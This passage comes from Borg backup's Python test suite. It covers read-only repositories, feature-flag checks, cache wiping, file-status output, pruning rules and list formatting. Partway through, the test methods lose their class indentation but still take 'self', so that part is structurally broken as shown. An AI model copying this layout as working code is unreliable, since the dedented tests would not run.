                self.cmd('export-tar', '%s::test' % self.repository_location, 'test.tar', exit_code=EXIT_ERROR)
            else:
                # in-process: a LockFailed surfaces directly, or wrapped as an RPCError remotely
                with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
                    self.cmd('export-tar', '%s::test' % self.repository_location, 'test.tar')
                if isinstance(excinfo.value, RemoteRepository.RPCError):
                    assert excinfo.value.exception_class == 'LockFailed'
            # verify that command works with read-only repo when using --bypass-lock
            self.cmd('export-tar', '%s::test' % self.repository_location, 'test.tar', '--bypass-lock')
    def test_readonly_extract(self):
        """'extract' on a read-only repo: fails without, works with --bypass-lock."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('test')
        with self.read_only(self.repository_path):
            # verify that command normally doesn't work with read-only repo
            if self.FORK_DEFAULT:
                self.cmd('extract', '%s::test' % self.repository_location, exit_code=EXIT_ERROR)
            else:
                # in-process: a LockFailed surfaces directly, or wrapped as an RPCError remotely
                with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
                    self.cmd('extract', '%s::test' % self.repository_location)
                if isinstance(excinfo.value, RemoteRepository.RPCError):
                    assert excinfo.value.exception_class == 'LockFailed'
            # verify that command works with read-only repo when using --bypass-lock
            self.cmd('extract', '%s::test' % self.repository_location, '--bypass-lock')
    def test_readonly_info(self):
        """'info' on a read-only repo: fails without, works with --bypass-lock."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('test')
        with self.read_only(self.repository_path):
            # verify that command normally doesn't work with read-only repo
            if self.FORK_DEFAULT:
                self.cmd('info', self.repository_location, exit_code=EXIT_ERROR)
            else:
                # in-process: a LockFailed surfaces directly, or wrapped as an RPCError remotely
                with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
                    self.cmd('info', self.repository_location)
                if isinstance(excinfo.value, RemoteRepository.RPCError):
                    assert excinfo.value.exception_class == 'LockFailed'
            # verify that command works with read-only repo when using --bypass-lock
            self.cmd('info', self.repository_location, '--bypass-lock')
    def test_readonly_list(self):
        """'list' on a read-only repo: fails without, works with --bypass-lock."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('test')
        with self.read_only(self.repository_path):
            # verify that command normally doesn't work with read-only repo
            if self.FORK_DEFAULT:
                self.cmd('list', self.repository_location, exit_code=EXIT_ERROR)
            else:
                # in-process: a LockFailed surfaces directly, or wrapped as an RPCError remotely
                with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
                    self.cmd('list', self.repository_location)
                if isinstance(excinfo.value, RemoteRepository.RPCError):
                    assert excinfo.value.exception_class == 'LockFailed'
            # verify that command works with read-only repo when using --bypass-lock
            self.cmd('list', self.repository_location, '--bypass-lock')
    @unittest.skipUnless(llfuse, 'llfuse not installed')
    def test_readonly_mount(self):
        """'mount' on a read-only repo: fails without, works with --bypass-lock."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('test')
        with self.read_only(self.repository_path):
            # verify that command normally doesn't work with read-only repo
            if self.FORK_DEFAULT:
                with self.fuse_mount(self.repository_location, exit_code=EXIT_ERROR):
                    pass
            else:
                # in-process: a LockFailed surfaces directly, or wrapped as an RPCError remotely
                with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
                    # self.fuse_mount always assumes fork=True, so for this test we have to manually set fork=False
                    with self.fuse_mount(self.repository_location, fork=False):
                        pass
                if isinstance(excinfo.value, RemoteRepository.RPCError):
                    assert excinfo.value.exception_class == 'LockFailed'
            # verify that command works with read-only repo when using --bypass-lock
            with self.fuse_mount(self.repository_location, None, '--bypass-lock'):
                pass
    @pytest.mark.skipif('BORG_TESTS_IGNORE_MODES' in os.environ, reason='modes unreliable')
    def test_umask(self):
        """A freshly used repository directory must end up with 0o700 permissions."""
        self.create_regular_file('file1', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        mode = os.stat(self.repository_path).st_mode
        self.assertEqual(stat.S_IMODE(mode), 0o700)
    def test_create_dry_run(self):
        """'create --dry-run' must not add an archive to the manifest."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', '--dry-run', self.repository_location + '::test', 'input')
        # Make sure no archive has been created
        with Repository(self.repository_path) as repository:
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
        self.assert_equal(len(manifest.archives), 0)
    def add_unknown_feature(self, operation):
        """Mark the manifest with a mandatory feature no client understands.

        Helper for the test_unknown_feature_* tests: after this, any command
        performing `operation` on the repo must refuse to proceed.
        """
        with Repository(self.repository_path, exclusive=True) as repository:
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            manifest.config[b'feature_flags'] = {operation.value.encode(): {b'mandatory': [b'unknown-feature']}}
            manifest.write()
            repository.commit(compact=False)
    def cmd_raises_unknown_feature(self, args):
        """Run `args` and assert it fails due to the 'unknown-feature' flag.

        Forked runs are checked via exit code; in-process runs via the
        MandatoryFeatureUnsupported exception and its payload.
        """
        if self.FORK_DEFAULT:
            self.cmd(*args, exit_code=EXIT_ERROR)
        else:
            with pytest.raises(MandatoryFeatureUnsupported) as excinfo:
                self.cmd(*args)
            assert excinfo.value.args == (['unknown-feature'],)
    def test_unknown_feature_on_create(self):
        """An unknown mandatory WRITE feature must block 'create'."""
        print(self.cmd('init', '--encryption=repokey', self.repository_location))
        self.add_unknown_feature(Manifest.Operation.WRITE)
        self.cmd_raises_unknown_feature(['create', self.repository_location + '::test', 'input'])
    def test_unknown_feature_on_cache_sync(self):
        """An unknown mandatory READ feature must block the cache resync done by 'create'."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        # drop the local cache so 'create' has to resync it (a READ operation)
        self.cmd('delete', '--cache-only', self.repository_location)
        self.add_unknown_feature(Manifest.Operation.READ)
        self.cmd_raises_unknown_feature(['create', self.repository_location + '::test', 'input'])
    def test_unknown_feature_on_change_passphrase(self):
        """An unknown mandatory CHECK feature must block 'key change-passphrase'."""
        print(self.cmd('init', '--encryption=repokey', self.repository_location))
        self.add_unknown_feature(Manifest.Operation.CHECK)
        self.cmd_raises_unknown_feature(['key', 'change-passphrase', self.repository_location])
    def test_unknown_feature_on_read(self):
        """An unknown mandatory READ feature must block extract, list and info."""
        print(self.cmd('init', '--encryption=repokey', self.repository_location))
        self.cmd('create', self.repository_location + '::test', 'input')
        self.add_unknown_feature(Manifest.Operation.READ)
        with changedir('output'):
            self.cmd_raises_unknown_feature(['extract', self.repository_location + '::test'])
        self.cmd_raises_unknown_feature(['list', self.repository_location])
        self.cmd_raises_unknown_feature(['info', self.repository_location + '::test'])
    def test_unknown_feature_on_rename(self):
        """An unknown mandatory CHECK feature must block 'rename'."""
        print(self.cmd('init', '--encryption=repokey', self.repository_location))
        self.cmd('create', self.repository_location + '::test', 'input')
        self.add_unknown_feature(Manifest.Operation.CHECK)
        self.cmd_raises_unknown_feature(['rename', self.repository_location + '::test', 'other'])
    def test_unknown_feature_on_delete(self):
        """An unknown mandatory DELETE feature must block archive delete/prune, but not repo delete."""
        print(self.cmd('init', '--encryption=repokey', self.repository_location))
        self.cmd('create', self.repository_location + '::test', 'input')
        self.add_unknown_feature(Manifest.Operation.DELETE)
        # delete of an archive raises
        self.cmd_raises_unknown_feature(['delete', self.repository_location + '::test'])
        self.cmd_raises_unknown_feature(['prune', '--keep-daily=3', self.repository_location])
        # delete of the whole repository ignores features
        self.cmd('delete', self.repository_location)
    @unittest.skipUnless(llfuse, 'llfuse not installed')
    def test_unknown_feature_on_mount(self):
        """An unknown mandatory READ feature must block 'mount'."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        self.add_unknown_feature(Manifest.Operation.READ)
        mountpoint = os.path.join(self.tmpdir, 'mountpoint')
        os.mkdir(mountpoint)
        # XXX this might hang if it doesn't raise an error
        self.cmd_raises_unknown_feature(['mount', self.repository_location + '::test', mountpoint])
    @pytest.mark.allow_cache_wipe
    def test_unknown_mandatory_feature_in_cache(self):
        """An unknown mandatory feature recorded in the *cache* must trigger a cache wipe.

        Plants 'unknown-feature' in the local cache config (not the manifest),
        runs 'create', and verifies the cache was wiped and its mandatory
        feature set reset.
        """
        if self.prefix:
            # remote test variant: location strings need the ssh testsuite prefix
            path_prefix = 'ssh://__testsuite__'
        else:
            path_prefix = ''
        print(self.cmd('init', '--encryption=repokey', self.repository_location))
        with Repository(self.repository_path, exclusive=True) as repository:
            if path_prefix:
                repository._location = Location(self.repository_location)
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            with Cache(repository, key, manifest) as cache:
                # inject the unknown feature into the cache config only
                cache.begin_txn()
                cache.cache_config.mandatory_features = set(['unknown-feature'])
                cache.commit()
        if self.FORK_DEFAULT:
            self.cmd('create', self.repository_location + '::test', 'input')
        else:
            # in-process: additionally verify that wipe_cache() really ran
            called = False
            wipe_cache_safe = LocalCache.wipe_cache
            def wipe_wrapper(*args):
                nonlocal called
                called = True
                wipe_cache_safe(*args)
            with patch.object(LocalCache, 'wipe_cache', wipe_wrapper):
                self.cmd('create', self.repository_location + '::test', 'input')
            assert called
        with Repository(self.repository_path, exclusive=True) as repository:
            if path_prefix:
                repository._location = Location(self.repository_location)
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            with Cache(repository, key, manifest) as cache:
                # after the wipe, no mandatory features remain in the cache
                assert cache.cache_config.mandatory_features == set([])
    def test_progress_on(self):
        """'create --progress' must emit carriage returns (progress line updates)."""
        self.create_regular_file('file1', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        output = self.cmd('create', '--progress', self.repository_location + '::test4', 'input')
        self.assert_in("\r", output)
    def test_progress_off(self):
        """Without --progress, 'create' must emit no carriage returns."""
        self.create_regular_file('file1', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        output = self.cmd('create', self.repository_location + '::test5', 'input')
        self.assert_not_in("\r", output)
    def test_file_status(self):
        """test that various file status show expected results

        clearly incomplete: only tests for the weird "unchanged" status for now"""
        self.create_regular_file('file1', size=1024 * 80)
        time.sleep(1)  # file2 must have newer timestamps than file1
        self.create_regular_file('file2', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        # first backup: everything is new -> 'A' (added)
        output = self.cmd('create', '--list', self.repository_location + '::test', 'input')
        self.assert_in("A input/file1", output)
        self.assert_in("A input/file2", output)
        # should find first file as unmodified
        output = self.cmd('create', '--list', self.repository_location + '::test1', 'input')
        self.assert_in("U input/file1", output)
        # this is expected, although surprising, for why, see:
        # https://borgbackup.readthedocs.org/en/latest/faq.html#i-am-seeing-a-added-status-for-a-unchanged-file
        self.assert_in("A input/file2", output)
    def test_file_status_cs_cache_mode(self):
        """test that a changed file with faked "previous" mtime still gets backed up in ctime,size cache_mode"""
        self.create_regular_file('file1', contents=b'123')
        time.sleep(1)  # file2 must have newer timestamps than file1
        self.create_regular_file('file2', size=10)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        output = self.cmd('create', '--list', '--files-cache=ctime,size', self.repository_location + '::test1', 'input')
        # modify file1, but cheat with the mtime (and atime) and also keep same size:
        st = os.stat('input/file1')
        self.create_regular_file('file1', contents=b'321')
        os.utime('input/file1', ns=(st.st_atime_ns, st.st_mtime_ns))
        # this mode uses ctime for change detection, so it should find file1 as modified
        output = self.cmd('create', '--list', '--files-cache=ctime,size', self.repository_location + '::test2', 'input')
        self.assert_in("M input/file1", output)
    def test_file_status_ms_cache_mode(self):
        """test that a chmod'ed file with no content changes does not get chunked again in mtime,size cache_mode"""
        self.create_regular_file('file1', size=10)
        time.sleep(1)  # file2 must have newer timestamps than file1
        self.create_regular_file('file2', size=10)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        output = self.cmd('create', '--list', '--files-cache=mtime,size', self.repository_location + '::test1', 'input')
        # change mode of file1, no content change:
        st = os.stat('input/file1')
        os.chmod('input/file1', st.st_mode ^ stat.S_IRWXO)  # this triggers a ctime change, but mtime is unchanged
        # this mode uses mtime for change detection, so it should find file1 as unmodified
        output = self.cmd('create', '--list', '--files-cache=mtime,size', self.repository_location + '::test2', 'input')
        self.assert_in("U input/file1", output)
    def test_file_status_rc_cache_mode(self):
        """test that files get rechunked unconditionally in rechunk,ctime cache mode"""
        self.create_regular_file('file1', size=10)
        time.sleep(1)  # file2 must have newer timestamps than file1
        self.create_regular_file('file2', size=10)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        output = self.cmd('create', '--list', '--files-cache=rechunk,ctime', self.repository_location + '::test1', 'input')
        # no changes here, but this mode rechunks unconditionally
        output = self.cmd('create', '--list', '--files-cache=rechunk,ctime', self.repository_location + '::test2', 'input')
        # unchanged file is still reported 'A' because it was rechunked, not cached
        self.assert_in("A input/file1", output)
def test_file_status_excluded(self):
    """test that excluded paths are listed"""
    self.create_regular_file('file1', size=1024 * 80)
    time.sleep(1)  # file2 must have newer timestamps than file1
    self.create_regular_file('file2', size=1024 * 80)
    if has_lchflags:
        # file3 gets the nodump flag, so --exclude-nodump must exclude it
        self.create_regular_file('file3', size=1024 * 80)
        platform.set_flags(os.path.join(self.input_path, 'file3'), stat.UF_NODUMP)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    output = self.cmd('create', '--list', '--exclude-nodump', self.repository_location + '::test', 'input')
    self.assert_in("A input/file1", output)
    self.assert_in("A input/file2", output)
    if has_lchflags:
        self.assert_in("x input/file3", output)
    # should find second file as excluded
    output = self.cmd('create', '--list', '--exclude-nodump', self.repository_location + '::test1', 'input', '--exclude', '*/file2')
    self.assert_in("U input/file1", output)
    self.assert_in("x input/file2", output)
    if has_lchflags:
        self.assert_in("x input/file3", output)
def test_create_json(self):
    """test that 'create --json' emits the expected top-level keys and archive fields"""
    self.create_regular_file('file1', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    create_info = json.loads(self.cmd('create', '--json', self.repository_location + '::test', 'input'))
    # The usual keys
    assert 'encryption' in create_info
    assert 'repository' in create_info
    assert 'cache' in create_info
    assert 'last_modified' in create_info['repository']
    archive = create_info['archive']
    assert archive['name'] == 'test'
    assert isinstance(archive['command_line'], list)
    assert isinstance(archive['duration'], float)
    assert len(archive['id']) == 64  # hex-encoded archive id
    assert 'stats' in archive
def test_create_topical(self):
    """test interaction of 'create' with --list and --filter status letters"""
    self.create_regular_file('file1', size=1024 * 80)
    time.sleep(1)  # file2 must have newer timestamps than file1
    self.create_regular_file('file2', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    # no listing by default
    output = self.cmd('create', self.repository_location + '::test', 'input')
    self.assert_not_in('file1', output)
    # shouldn't be listed even if unchanged
    output = self.cmd('create', self.repository_location + '::test0', 'input')
    self.assert_not_in('file1', output)
    # should list the file as unchanged
    output = self.cmd('create', '--list', '--filter=U', self.repository_location + '::test1', 'input')
    self.assert_in('file1', output)
    # should *not* list the file as changed
    output = self.cmd('create', '--list', '--filter=AM', self.repository_location + '::test2', 'input')
    self.assert_not_in('file1', output)
    # change the file
    self.create_regular_file('file1', size=1024 * 100)
    # should list the file as changed
    output = self.cmd('create', '--list', '--filter=AM', self.repository_location + '::test3', 'input')
    self.assert_in('file1', output)
@pytest.mark.skipif(not are_fifos_supported(), reason='FIFOs not supported')
def test_create_read_special_symlink(self):
    """test that --read-special follows a symlink to a FIFO and archives the FIFO's content"""
    from threading import Thread

    def fifo_feeder(fifo_fn, data):
        # runs in a background thread: opening the FIFO for writing blocks
        # until borg opens it for reading
        fd = os.open(fifo_fn, os.O_WRONLY)
        try:
            os.write(fd, data)
        finally:
            os.close(fd)

    self.cmd('init', '--encryption=repokey', self.repository_location)
    archive = self.repository_location + '::test'
    data = b'foobar' * 1000
    fifo_fn = os.path.join(self.input_path, 'fifo')
    link_fn = os.path.join(self.input_path, 'link_fifo')
    os.mkfifo(fifo_fn)
    os.symlink(fifo_fn, link_fn)
    t = Thread(target=fifo_feeder, args=(fifo_fn, data))
    t.start()
    try:
        self.cmd('create', '--read-special', archive, 'input/link_fifo')
    finally:
        t.join()
    with changedir('output'):
        self.cmd('extract', archive)
        # the symlinked FIFO must have been archived as a regular file with the fed data
        fifo_fn = 'input/link_fifo'
        with open(fifo_fn, 'rb') as f:
            extracted_data = f.read()
    assert extracted_data == data
def test_create_read_special_broken_symlink(self):
    """test that --read-special archives a dangling symlink as a symlink (and does not crash)"""
    os.symlink('somewhere does not exist', os.path.join(self.input_path, 'link'))
    self.cmd('init', '--encryption=repokey', self.repository_location)
    archive = self.repository_location + '::test'
    self.cmd('create', '--read-special', archive, 'input')
    output = self.cmd('list', archive)
    assert 'input/link -> somewhere does not exist' in output
# def test_cmdline_compatibility(self):
# self.create_regular_file('file1', size=1024 * 80)
# self.cmd('init', '--encryption=repokey', self.repository_location)
# self.cmd('create', self.repository_location + '::test', 'input')
# output = self.cmd('foo', self.repository_location, '--old')
# self.assert_in('"--old" has been deprecated. Use "--new" instead', output)
def test_prune_repository(self):
    """test basic prune: keep-daily rule, checkpoint archive handling, dry-run vs. real prune"""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test1', src_dir)
    self.cmd('create', self.repository_location + '::test2', src_dir)
    # these are not really checkpoints, but they look like some:
    self.cmd('create', self.repository_location + '::test3.checkpoint', src_dir)
    self.cmd('create', self.repository_location + '::test3.checkpoint.1', src_dir)
    self.cmd('create', self.repository_location + '::test4.checkpoint', src_dir)
    output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=1')
    assert re.search(r'Would prune:\s+test1', output)
    # must keep the latest non-checkpoint archive:
    assert re.search(r'Keeping archive \(rule: daily #1\):\s+test2', output)
    # must keep the latest checkpoint archive:
    assert re.search(r'Keeping checkpoint archive:\s+test4.checkpoint', output)
    # dry-run must not have pruned anything:
    output = self.cmd('list', '--consider-checkpoints', self.repository_location)
    self.assert_in('test1', output)
    self.assert_in('test2', output)
    self.assert_in('test3.checkpoint', output)
    self.assert_in('test3.checkpoint.1', output)
    self.assert_in('test4.checkpoint', output)
    self.cmd('prune', self.repository_location, '--keep-daily=1')
    output = self.cmd('list', '--consider-checkpoints', self.repository_location)
    self.assert_not_in('test1', output)
    # the latest non-checkpoint archive must be still there:
    self.assert_in('test2', output)
    # only the latest checkpoint archive must still be there:
    self.assert_not_in('test3.checkpoint', output)
    self.assert_not_in('test3.checkpoint.1', output)
    self.assert_in('test4.checkpoint', output)
    # now we supersede the latest checkpoint by a successful backup:
    self.cmd('create', self.repository_location + '::test5', src_dir)
    self.cmd('prune', self.repository_location, '--keep-daily=2')
    output = self.cmd('list', '--consider-checkpoints', self.repository_location)
    # all checkpoints should be gone now:
    self.assert_not_in('checkpoint', output)
    # the latest archive must be still there
    self.assert_in('test5', output)
def _to_utc_timestamp(self, year, month, day, hour, minute, second):
    """Convert a date/time given in the local timezone into a UTC timestamp
    string suitable for the ``create --timestamp`` command line option."""
    local_dt = datetime(year, month, day, hour, minute, second, 0, dateutil.tz.gettz())
    utc_dt = local_dt.astimezone(dateutil.tz.UTC)
    return utc_dt.strftime("%Y-%m-%dT%H:%M:%S")
def _create_archive_ts(self, name, y, m, d, H=0, M=0, S=0):
    """Create an archive *name* of src_dir with the given local-time creation timestamp."""
    timestamp = self._to_utc_timestamp(y, m, d, H, M, S)
    self.cmd('create', '--timestamp', timestamp, self.repository_location + '::' + name, src_dir)
# This test must match docs/misc/prune-example.txt
def test_prune_repository_example(self):
    """test the documented prune example: --keep-daily=14 --keep-monthly=6 --keep-yearly=1"""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    # Archives that will be kept, per the example
    # Oldest archive
    self._create_archive_ts('test01', 2015, 1, 1)
    # 6 monthly archives
    self._create_archive_ts('test02', 2015, 6, 30)
    self._create_archive_ts('test03', 2015, 7, 31)
    self._create_archive_ts('test04', 2015, 8, 31)
    self._create_archive_ts('test05', 2015, 9, 30)
    self._create_archive_ts('test06', 2015, 10, 31)
    self._create_archive_ts('test07', 2015, 11, 30)
    # 14 daily archives
    self._create_archive_ts('test08', 2015, 12, 17)
    self._create_archive_ts('test09', 2015, 12, 18)
    self._create_archive_ts('test10', 2015, 12, 20)
    self._create_archive_ts('test11', 2015, 12, 21)
    self._create_archive_ts('test12', 2015, 12, 22)
    self._create_archive_ts('test13', 2015, 12, 23)
    self._create_archive_ts('test14', 2015, 12, 24)
    self._create_archive_ts('test15', 2015, 12, 25)
    self._create_archive_ts('test16', 2015, 12, 26)
    self._create_archive_ts('test17', 2015, 12, 27)
    self._create_archive_ts('test18', 2015, 12, 28)
    self._create_archive_ts('test19', 2015, 12, 29)
    self._create_archive_ts('test20', 2015, 12, 30)
    self._create_archive_ts('test21', 2015, 12, 31)
    # Additional archives that would be pruned
    # The second backup of the year
    self._create_archive_ts('test22', 2015, 1, 2)
    # The next older monthly backup
    self._create_archive_ts('test23', 2015, 5, 31)
    # The next older daily backup
    self._create_archive_ts('test24', 2015, 12, 16)
    output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=14', '--keep-monthly=6', '--keep-yearly=1')
    # Prune second backup of the year
    assert re.search(r'Would prune:\s+test22', output)
    # Prune next older monthly and daily backups
    assert re.search(r'Would prune:\s+test23', output)
    assert re.search(r'Would prune:\s+test24', output)
    # Must keep the other 21 backups
    # Yearly is kept as oldest archive
    assert re.search(r'Keeping archive \(rule: yearly\[oldest\] #1\):\s+test01', output)
    # monthly #1..#6 map to test07..test02 (newest first)
    for i in range(1, 7):
        assert re.search(r'Keeping archive \(rule: monthly #' + str(i) + r'\):\s+test' + ("%02d" % (8-i)), output)
    # daily #1..#14 map to test21..test08 (newest first)
    for i in range(1, 15):
        assert re.search(r'Keeping archive \(rule: daily #' + str(i) + r'\):\s+test' + ("%02d" % (22-i)), output)
    output = self.cmd('list', self.repository_location)
    # Nothing pruned after dry run
    for i in range(1, 25):
        self.assert_in('test%02d' % i, output)
    self.cmd('prune', self.repository_location, '--keep-daily=14', '--keep-monthly=6', '--keep-yearly=1')
    output = self.cmd('list', self.repository_location)
    # All matching backups plus oldest kept
    for i in range(1, 22):
        self.assert_in('test%02d' % i, output)
    # Other backups have been pruned
    for i in range(22, 25):
        self.assert_not_in('test%02d' % i, output)
# With an initial and daily backup, prune daily until oldest is replaced by a monthly backup
def test_prune_retain_and_expire_oldest(self):
    """test that the [oldest] fallback keeps the first archive until a real monthly replaces it"""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    # Initial backup
    self._create_archive_ts('original_archive', 2020, 9, 1, 11, 15)
    # Archive and prune daily for 30 days
    for i in range(1, 31):
        self._create_archive_ts('september%02d' % i, 2020, 9, i, 12)
        self.cmd('prune', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
    # Archive and prune 6 days into the next month
    for i in range(1, 7):
        self._create_archive_ts('october%02d' % i, 2020, 10, i, 12)
        self.cmd('prune', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
    # Oldest backup is still retained
    output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
    assert re.search(r'Keeping archive \(rule: monthly\[oldest\] #1' + r'\):\s+original_archive', output)
    # Archive one more day and prune.
    self._create_archive_ts('october07', 2020, 10, 7, 12)
    self.cmd('prune', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
    # Last day of previous month is retained as monthly, and oldest is expired.
    output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
    assert re.search(r'Keeping archive \(rule: monthly #1\):\s+september30', output)
    self.assert_not_in('original_archive', output)
def test_prune_repository_save_space(self):
    """test that prune with --save-space produces the same result as a normal prune"""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test1', src_dir)
    self.cmd('create', self.repository_location + '::test2', src_dir)
    output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=1')
    assert re.search(r'Keeping archive \(rule: daily #1\):\s+test2', output)
    assert re.search(r'Would prune:\s+test1', output)
    # dry-run must not have pruned anything:
    output = self.cmd('list', self.repository_location)
    self.assert_in('test1', output)
    self.assert_in('test2', output)
    self.cmd('prune', '--save-space', self.repository_location, '--keep-daily=1')
    output = self.cmd('list', self.repository_location)
    self.assert_not_in('test1', output)
    self.assert_in('test2', output)
def test_prune_repository_prefix(self):
    """test that prune with --prefix only considers matching archives"""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::foo-2015-08-12-10:00', src_dir)
    self.cmd('create', self.repository_location + '::foo-2015-08-12-20:00', src_dir)
    self.cmd('create', self.repository_location + '::bar-2015-08-12-10:00', src_dir)
    self.cmd('create', self.repository_location + '::bar-2015-08-12-20:00', src_dir)
    output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=1', '--prefix=foo-')
    assert re.search(r'Keeping archive \(rule: daily #1\):\s+foo-2015-08-12-20:00', output)
    assert re.search(r'Would prune:\s+foo-2015-08-12-10:00', output)
    # dry-run must not have pruned anything:
    output = self.cmd('list', self.repository_location)
    self.assert_in('foo-2015-08-12-10:00', output)
    self.assert_in('foo-2015-08-12-20:00', output)
    self.assert_in('bar-2015-08-12-10:00', output)
    self.assert_in('bar-2015-08-12-20:00', output)
    self.cmd('prune', self.repository_location, '--keep-daily=1', '--prefix=foo-')
    # only the older foo- archive is pruned; bar- archives are untouched:
    output = self.cmd('list', self.repository_location)
    self.assert_not_in('foo-2015-08-12-10:00', output)
    self.assert_in('foo-2015-08-12-20:00', output)
    self.assert_in('bar-2015-08-12-10:00', output)
    self.assert_in('bar-2015-08-12-20:00', output)
def test_prune_repository_glob(self):
    """test that prune with --glob-archives only considers matching archives"""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::2015-08-12-10:00-foo', src_dir)
    self.cmd('create', self.repository_location + '::2015-08-12-20:00-foo', src_dir)
    self.cmd('create', self.repository_location + '::2015-08-12-10:00-bar', src_dir)
    self.cmd('create', self.repository_location + '::2015-08-12-20:00-bar', src_dir)
    output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=1', '--glob-archives=2015-*-foo')
    assert re.search(r'Keeping archive \(rule: daily #1\):\s+2015-08-12-20:00-foo', output)
    assert re.search(r'Would prune:\s+2015-08-12-10:00-foo', output)
    # dry-run must not have pruned anything:
    output = self.cmd('list', self.repository_location)
    self.assert_in('2015-08-12-10:00-foo', output)
    self.assert_in('2015-08-12-20:00-foo', output)
    self.assert_in('2015-08-12-10:00-bar', output)
    self.assert_in('2015-08-12-20:00-bar', output)
    self.cmd('prune', self.repository_location, '--keep-daily=1', '--glob-archives=2015-*-foo')
    # only the older -foo archive is pruned; -bar archives are untouched:
    output = self.cmd('list', self.repository_location)
    self.assert_not_in('2015-08-12-10:00-foo', output)
    self.assert_in('2015-08-12-20:00-foo', output)
    self.assert_in('2015-08-12-10:00-bar', output)
    self.assert_in('2015-08-12-20:00-bar', output)
def test_list_prefix(self):
    """test that 'list --prefix' only shows archives whose names match the prefix"""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test-1', src_dir)
    self.cmd('create', self.repository_location + '::something-else-than-test-1', src_dir)
    self.cmd('create', self.repository_location + '::test-2', src_dir)
    output = self.cmd('list', '--prefix=test-', self.repository_location)
    self.assert_in('test-1', output)
    self.assert_in('test-2', output)
    self.assert_not_in('something-else', output)
def test_list_format(self):
    """test 'list --format': the default format spelled out explicitly must match
    the default output, and a different format must produce different output"""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    test_archive = self.repository_location + '::test'
    self.cmd('create', test_archive, src_dir)
    output_1 = self.cmd('list', test_archive)
    output_2 = self.cmd('list', '--format', '{mode} {user:6} {group:6} {size:8d} {mtime} {path}{extra}{NEWLINE}', test_archive)
    output_3 = self.cmd('list', '--format', '{mtime:%s} {path}{NL}', test_archive)
    self.assertEqual(output_1, output_2)
    self.assertNotEqual(output_1, output_3)
def test_list_repository_format(self):
    """test repository-level 'list' formatting: default format, --short, custom formats"""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', '--comment', 'comment 1', self.repository_location + '::test-1', src_dir)
    self.cmd('create', '--comment', 'comment 2', self.repository_location + '::test-2', src_dir)
    output_1 = self.cmd('list', self.repository_location)
    # the default archive-listing format, spelled out explicitly:
    output_2 = self.cmd('list', '--format', '{archive:<36} {time} [{id}]{NL}', self.repository_location)
    self.assertEqual(output_1, output_2)
    output_1 = self.cmd('list', '--short', self.repository_location)
    self.assertEqual(output_1, 'test-1\ntest-2\n')
    output_1 = self.cmd('list', '--format', '{barchive}/', self.repository_location)
    self.assertEqual(output_1, 'test-1/test-2/')
    output_3 = self.cmd('list', '--format', '{name} {comment}{NL}', self.repository_location)
    self.assert_in('test-1 comment 1\n', output_3)
    self.assert_in('test-2 comment 2\n', output_3)
def test_list_hash(self):
    """test the {sha256} list format key against known digests"""
    self.create_regular_file('empty_file', size=0)
    self.create_regular_file('amb', contents=b'a' * 1000000)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    test_archive = self.repository_location + '::test'
    self.cmd('create', test_archive, 'input')
    output = self.cmd('list', '--format', '{sha256} {path}{NL}', test_archive)
    # known sha256 of 1000000 * b'a':
    assert "cdc76e5c9914fb9281a1c7e284d73e67f1809a48a497200e046d39ccc7112cd0 input/amb" in output
    # sha256 of the empty string:
    assert "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 input/empty_file" in output
def test_list_consider_checkpoints(self):
    """test that checkpoint archives are hidden by default and shown with --consider-checkpoints"""
